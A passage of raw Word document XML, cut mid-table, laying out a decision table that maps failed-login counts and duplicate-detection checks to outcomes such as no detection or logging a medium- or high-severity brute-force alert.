              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="092ADA2E" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Failed logins ≥ 50?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="092ADA2E" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection with same dedupe key exists?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2F983AC4" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2F983AC4" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Log BRUTE_FORCE — MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2F983AC4" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Log BRUTE_FORCE — HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
